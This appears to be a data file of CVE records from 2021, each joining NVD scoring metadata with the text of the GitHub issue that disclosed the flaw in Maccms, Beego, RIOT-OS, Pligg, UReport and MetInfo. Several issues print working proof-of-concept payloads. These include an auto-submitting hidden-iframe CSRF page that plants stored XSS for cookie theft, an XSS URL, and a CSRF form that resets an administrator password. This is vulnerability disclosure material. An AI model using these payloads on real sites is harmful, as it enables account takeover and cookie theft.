2019-12-15T08:31:39Z
https://github.com/saitoha/libsixel/issues/75
345,443,459
75
2,481
CVE-2020-21081
2021-09-14T16:15:09.197
A cross-site request forgery (CSRF) in Maccms 8.0 causes administrators to add and modify articles without their knowledge via clicking on a crafted URL.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms8/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/magicblack/maccms8/issues/2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:maccms:maccms:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93D75918-25B5-4D87-8C9E-112C215DDEE6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/magicblack/maccms8/issues/2
[ "Exploit", "Third Party Advisory" ]
github.com
[ "magicblack", "maccms8" ]
# xss XSS vulnerability exists in the background administrator article management office when adding and modifying Where Chinese and English names are entered, enter `" onmousemove=alert(document.cookie) src=x`,Following chart ![1](https://user-images.githubusercontent.com/32705816/67657905-11768700-f993-11e9-96a5-02723fb74847.png) Move the mouse over the label in the background article management area and the administrator cookie will pop up, as shown in the following figure ![2](https://user-images.githubusercontent.com/32705816/67657956-3f5bcb80-f993-11e9-9b00-1888d9e57bc6.png) User cookies will also pop up when the front page mouse moves over the title ![3](https://user-images.githubusercontent.com/32705816/67658116-a37e8f80-f993-11e9-9d0f-df6ce6227cac.png) **** # csrf It is found that CSRF exists at the same time of adding and modifying Before use ![4](https://user-images.githubusercontent.com/32705816/67658377-6070ec00-f994-11e9-813d-55539e345c6e.png) When the following page is constructed, the administrator can be induced to click ```html <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST"> <input type="hidden" name="t&#95;id" value="" /> <input type="hidden" name="flag" value="add" /> <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" /> <input type="hidden" name="t&#95;pid" value="0" /> <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" /> <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" /> <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" /> <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" /> <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" /> <input type="hidden" name="t&#95;key" value="" /> <input type="hidden" name="t&#95;des" value="" /> <input type="hidden" name="t&#95;title" value="" /> <input type="hidden" name="t&#95;sort" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` When the administrator visits the click Page ![image](https://user-images.githubusercontent.com/32705816/67662589-aa5ecf80-f99e-11e9-80ed-eb4bb22628e1.png) Category added successfully ![image](https://user-images.githubusercontent.com/32705816/67662704-e003b880-f99e-11e9-8daa-594885685d7b.png) **** # csrf+xss Here, CSRF and XSS can be used together, and attackers can use CSRF vulnerability to add or fix code brought in by articles, ```html <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Welcome to CSRF</title> </head> <p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p> <body> <iframe hidden width=1000 heigth=100 src="#" srcdoc=' <form action="http://localhost/maccms8/safetest/admin_data.php?ac=save&tab=art_type" method="POST" name="form"> <input type="hidden" name="t&#95;id" value="" /> <input type="hidden" name="flag" value="add" /> <input type="hidden" name="backurl" value="http&#58;&#47;&#47;localhost&#47;maccms8&#47;safetest&#47;index&#46;php&#63;m&#61;art&#45;type" /> <input type="hidden" name="t&#95;pid" value="0" /> <input type="hidden" name="t&#95;name" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" /> <input type="hidden" name="t&#95;enname" value="test&quot;&#32;onmousemove&#61;alert&#40;document&#46;cookie&#41;&#32;src&#61;x" /> <input type="hidden" name="t&#95;tpl" value="art&#95;type&#46;html" /> <input type="hidden" name="t&#95;tpl&#95;list" value="art&#95;list&#46;html" /> <input type="hidden" name="t&#95;tpl&#95;art" value="art&#95;detail&#46;html" /> <input type="hidden" name="t&#95;key" value="" /> <input type="hidden" name="t&#95;des" value="" /> <input type="hidden" name="t&#95;title" value="" /> <input type="hidden" name="t&#95;sort" value="" /> <input type="submit" value="Submit request" /> </form> <script> //Automatic submission document.form.submit(); </script> '></iframe> </body> </html> ``` After the user accesses the link, the hidden iframe automatically submits the form and successfully adds the article classification with malicious code without the user's knowledge. Malicious code can send the user's cookie to the attacker's remote server and steal the user's cookie or administrator's cookie. ![image](https://user-images.githubusercontent.com/32705816/67662898-3ffa5f00-f99f-11e9-8b5e-9cf500c95374.png)
There are CSRF and XSS vulnerabilities in the background, which can be combined to steal user cookies and administrator cookies
https://api.github.com/repos/magicblack/maccms8/issues/2/comments
1
2019-10-28T08:33:24Z
2019-12-02T15:56:38Z
https://github.com/magicblack/maccms8/issues/2
513,164,143
2
2,482
CVE-2021-39391
2021-09-14T18:15:08.900
Cross Site Scripting (XSS) vulnerability exists in the admin panel in Beego v2.0.1 via the URI path in an HTTP request, which is activated by administrators viewing the "Request Statistics" page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/beego/beego" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beego/beego/issues/4727" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/beego/beego" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/beego/beego/issues/4727" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:beego:beego:2.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "3B58EC25-E45E-4F44-9EAC-CE89FFE0D709", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/beego/beego/issues/4727
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "beego", "beego" ]
When navigating to a page, the path is not sanitized in the "Request statistics" in the admin panel, leading to an XSS. For example, navigating to ```http://beego-site/<script>alert(1)</script>``` leads to an alert when viewed on the admin panel: ![MicrosoftTeams-image (21)](https://user-images.githubusercontent.com/80689106/129478530-f7b08e49-8dba-4e4f-a122-f2f82c6400dc.png)
XSS in Admin Panel
https://api.github.com/repos/beego/beego/issues/4727/comments
1
2021-08-15T12:28:51Z
2021-08-16T16:40:01Z
https://github.com/beego/beego/issues/4727
971,122,817
4,727
2,483
CVE-2021-41061
2021-09-15T12:15:16.753
In RIOT-OS 2021.01, nonce reuse in 802.15.4 encryption in the ieee820154_security component allows attackers to break encryption by triggering reboots.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16844" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RIOT-OS/RIOT/issues/16844" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:riot-os:riot:2021.01:*:*:*:*:*:*:*", "matchCriteriaId": "8F041205-8394-4EA3-BC9A-CFA9690634F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "330" ]
330
https://github.com/RIOT-OS/RIOT/issues/16844
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RIOT-OS", "RIOT" ]
#### Description The frame counter used with ieee802154_security is initialized with 0 at startup. While it is protected against overflow, it is not protected against being reset, and that reset happens whenever the device restarts. As the key is flashed into the device in ieee802154_security's normal operation, and the sender LL address is constant per device, the same nonce (varying only through the resetting frame counter) is used in the AES encryption multiple times. Reuse of the same (nonce, key) breaks confidentiality guarantees. (AES-CCM is used here, so AIU it's [not as bad](https://crypto.stackexchange.com/questions/26790/how-bad-it-is-using-the-same-iv-twice-with-aes-gcm) as if GCM were used, when there'd be key leakage). #### Steps to reproduce the issue (All done on microbit-v2; I have high confidence in this working on any 802.15.4 encryption capable device). * Sniff for packages, eg. by building the default module. * Build the gcoap example with `USEMODULE+=ieee802154_security` * Send out a GET request to the sniffer module, path `/hello_world/coap` * Repeat the request a few times (to cancel any jitter in the number of messages sent during startup) * Reboot the device, eg. by power cycling it * Send out GET requests to the same address, path `/.well-known/core` #### Expected results * Requests after the reboot use different sequence numbers. #### Actual results * Requests after the reboot start from the same zero sequence number again. * Requests have byte-wise identical requests in regions of equal content, eg. (asterisks mine) ``` ~~ SNIP 0 - size: 45 byte, type: NETTYPE_UNDEF (0) 00000000 06 05 00 00 00 9B 51 C4 68 F6 D4 E9 4D 96 *89 5E* 00000010 1F F2 60 BC *95* 33 80 F2 *20* FE 90 EE 78 4A D5 74 00000020 *39 91 74* F6 84 6E DE C4 CC 3C 05 7A 60 ``` ``` ~~ SNIP 0 - size: 45 byte, type: NETTYPE_UNDEF (0) 00000000 06 05 00 00 00 9B 51 C4 68 F6 D4 E9 7A AB *89 5E* 00000010 0A D1 65 84 *95* 75 92 FB *20* FD E2 F2 79 57 CE 7E 00000020 *39 91 74* E5 91 6F 6B A7 FE CE 0F A9 14 ``` (Note the `20` in the second row where the shared "l" of "hello" and "well" is, as well as the "\x04co" of the "core" / "coap" option; variation is in MIDs (first row bytes 12-13), token (second row, first 4 bytes) and the diverting texts). #### Versions and cross-references All since introduction in 2021.01 until current HEAD. Since #16841, the module in question has been marked as experimental. Disclosing this has been discussed in the [closed security list](https://forum.riot-os.org/t/security-issues-with-ieee802154-security/3348/11), and was deemed responsible given the overall circumstances. [CVE-2021-41061](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41061) has been assigned to this issue. #### Road forward This is not trivial to fix, as we don't have any committed persistence inside generic devices, and even with 6TiSCH minimal security the problem is just shifted (for [section 4.6](https://www.rfc-editor.org/rfc/rfc8180.html#section-4.6) requires monotony of ASNs on the device which is equivalent to this problem, although it'd shift the attack difficulty to an active replay of old beacons). Likewise, most advanced modes need persistence, until (with [ace-ake-authz](https://datatracker.ietf.org/doc/html/draft-selander-ace-ake-authz-03)) asymmetric negotiation comes into play. Off my head I don't know any standard solutions that can do with neither asymmetric cryptography nor local persistence; some randomness based scheme could possibly be deployed but it'd be very ad-hoc, custom and eventually not easier than the existing solutions. I think that the discussion in #16730 can serve as a starting point.
ieee802154_security: Nonce is reused after reboot
https://api.github.com/repos/RIOT-OS/RIOT/issues/16844/comments
10
2021-09-14T07:24:59Z
2023-04-19T22:54:35Z
https://github.com/RIOT-OS/RIOT/issues/16844
995,683,197
16,844
2,484
CVE-2020-21121
2021-09-15T17:15:08.207
Pligg CMS 2.0.2 contains a time-based SQL injection vulnerability via the $recordIDValue parameter in the admin_update_module_widgets.php file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/259" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/259" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kliqqi:kliqqi_cms:2.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "7FA8A074-F9FF-4CE1-9E47-D9DB7D776D68", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/259
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Kliqqi-CMS", "Kliqqi-CMS" ]
This is a SQL Injection vulerable in "admin_update_module_widgets.php" file. At line 47, "$recordIDValue" Parameters are not wrapped in single quotes. And the parameters also are not safely processed. ![image](https://user-images.githubusercontent.com/17540142/67925859-7c23fe80-fbef-11e9-9c02-3c88a5ef8c2a.png) When you have installed modules. There is a time-based sql injection.(If the tables didn't exists datas, time-based didn't work) ![image](https://user-images.githubusercontent.com/17540142/67935771-87822480-fc05-11e9-9ad1-477fc811c159.png) ![image](https://user-images.githubusercontent.com/17540142/67935773-88b35180-fc05-11e9-8594-04e118a35cb9.png) ![image](https://user-images.githubusercontent.com/17540142/67935775-89e47e80-fc05-11e9-9400-c803f9e9fa91.png)
SQL Injection Vulerable.
https://api.github.com/repos/Kliqqi-CMS/Kliqqi-CMS/issues/259/comments
0
2019-10-31T09:41:21Z
2019-10-31T09:41:21Z
https://github.com/Kliqqi-CMS/Kliqqi-CMS/issues/259
515,291,262
259
2,485
CVE-2020-21122
2021-09-15T17:15:08.607
UReport v2.2.9 contains a Server-Side Request Forgery (SSRF) in the designer page which allows attackers to detect intranet device ports.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/youseries/ureport/issues/483" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/youseries/ureport/issues/483" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ureport_project:ureport:2.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "10CADB94-5E0B-48FD-8430-516DAF5FD34C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/youseries/ureport/issues/483
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "youseries", "ureport" ]
In this part of source code, we find that users can make connection requests to any IP address. ![image](https://user-images.githubusercontent.com/17540142/69843324-e5a43500-12a1-11ea-83aa-ae122e51413c.png) Then we found that the designer page did not verify the access user's permission. So we can directly implement the SSRF attack on this page to detect the database port of the intranet device. ![image](https://user-images.githubusercontent.com/17540142/69843383-33b93880-12a2-11ea-98c4-4f80a5e4baed.png) ![image](https://user-images.githubusercontent.com/17540142/69843388-3ddb3700-12a2-11ea-8418-d16f837d3f20.png) When the database port is detected to be open, the page will respond to the database login failure. ![image](https://user-images.githubusercontent.com/17540142/69843423-63684080-12a2-11ea-8bf0-ea59e8e51ca9.png)
An unauthorized SSRF vulnerability in the designer page.
https://api.github.com/repos/youseries/ureport/issues/483/comments
0
2019-11-29T04:20:17Z
2019-11-29T04:20:17Z
https://github.com/youseries/ureport/issues/483
530,148,729
483
2,486
CVE-2020-21124
2021-09-15T17:15:08.730
UReport 2.2.9 allows attackers to execute arbitrary code due to a lack of access control to the designer page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/youseries/ureport/issues/484" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/youseries/ureport/issues/484" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ureport_project:ureport:2.2.9:*:*:*:*:*:*:*", "matchCriteriaId": "10CADB94-5E0B-48FD-8430-516DAF5FD34C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/youseries/ureport/issues/484
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "youseries", "ureport" ]
With the following source code, we can easily find that the 'class. Forname' method can load malicious classes. ![image](https://user-images.githubusercontent.com/17540142/69845356-60be1900-12ab-11ea-8e5f-2add90c11d26.png) 'Class.forname' is a method for JVM to retrieve and load into memory. In this process, the static phase of loading class will be executed. In other words, if a malicious class is defined in advance, you can execute the static code block of the malicious class here. ![image](https://user-images.githubusercontent.com/17540142/69845396-88ad7c80-12ab-11ea-9bd6-db700e837557.png) We successfully execute the code by loading the malicious classes set in advance. ![image](https://user-images.githubusercontent.com/17540142/69845454-b1357680-12ab-11ea-93e8-43739276702e.png)
Local malicious class loading and code execution vulnerability due to unauthorized access to designer page.
https://api.github.com/repos/youseries/ureport/issues/484/comments
0
2019-11-29T05:25:46Z
2019-11-29T05:25:46Z
https://github.com/youseries/ureport/issues/484
530,161,732
484
2,487
CVE-2020-21126
2021-09-15T17:15:08.957
MetInfo 7.0.0 contains a Cross-Site Request Forgery (CSRF) via admin/?n=admin&c=index&a=doSaveInfo.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Echox1/metinfo_csrf/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Echox1/metinfo_csrf/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:metinfo:metinfo:7.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "65A2CB16-CC11-4C8B-9CCC-7241BDD92E0C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/Echox1/metinfo_csrf/issues/1
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Echox1", "metinfo_csrf" ]
There is a csrf via admin/?n=admin&c=index&a=doSaveInfo to update the admin user account request: ```POST /MetInfo7.0.0/admin/?n=admin&c=index&a=doSaveInfo HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------247693219225194 Content-Length: 785 Connection: close Referer: http://localhost/MetInfo7.0.0/admin/ Cookie: PHPSESSID=01b80466de9751fc3c1cfc72f0950804; Hm_lvt_520556228c0113270c0c772027905838=1575270458; Hm_lpvt_520556228c0113270c0c772027905838=1575270478; re_url=http%3A%2F%2Flocalhost%2FMetInfo7.0.0%2Fadmin%2F; met_auth=6944U4%2BNf5GMXxbjMcP%2FdpXg%2BQxXwKoiip8qdn7r4Y1gU40Kx1SrC79hAb9msm2YHoVx3P0sbF65jOP162y%2FgJxYlA; met_key=hE8G3QZ; admin_lang=cn; page_iframe_url=http%3A%2F%2Flocalhost%2FMetInfo7.0.0%2Findex.php%3Flang%3Dcn%26pageset%3D1; arrlanguage=metinfo -----------------------------247693219225194 Content-Disposition: form-data; name="admin_pass" admin1234 -----------------------------247693219225194 Content-Disposition: form-data; name="admin_pass_replay" admin1234 -----------------------------247693219225194 Content-Disposition: form-data; name="admin_name" test -----------------------------247693219225194 Content-Disposition: form-data; name="admin_mobile" -----------------------------247693219225194 Content-Disposition: form-data; name="admin_email" -----------------------------247693219225194 Content-Disposition: form-data; name="id" 1 -----------------------------247693219225194 Content-Disposition: form-data; name="submit_type" save -----------------------------247693219225194-- ``` payload: ```<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/MetInfo7.0.0/admin/?n=admin&c=index&a=doSaveInfo" method="POST" enctype="multipart/form-data"> <input type="hidden" name="admin&#95;pass" value="admin1234" /> <input type="hidden" name="admin&#95;pass&#95;replay" value="admin1234" /> <input type="hidden" name="admin&#95;name" value="test" /> <input type="hidden" name="admin&#95;mobile" value="" /> <input type="hidden" name="admin&#95;email" value="" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="submit&#95;type" value="save" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` use burpsuite test ![image](https://user-images.githubusercontent.com/16176698/69940137-78e89f00-151c-11ea-888a-144ea4765c22.png)
There is a csrf in MetInfo 7.0.0 via admin/?n=admin&c=index&a=doSaveInfo to update the admin user
https://api.github.com/repos/Echox1/metinfo_csrf/issues/1/comments
0
2019-12-02T08:00:27Z
2019-12-02T08:01:46Z
https://github.com/Echox1/metinfo_csrf/issues/1
530,957,069
1
2,488
CVE-2020-21127
2021-09-15T17:15:09.037
MetInfo 7.0.0 contains a SQL injection vulnerability via admin/?n=logs&c=index&a=dodel.
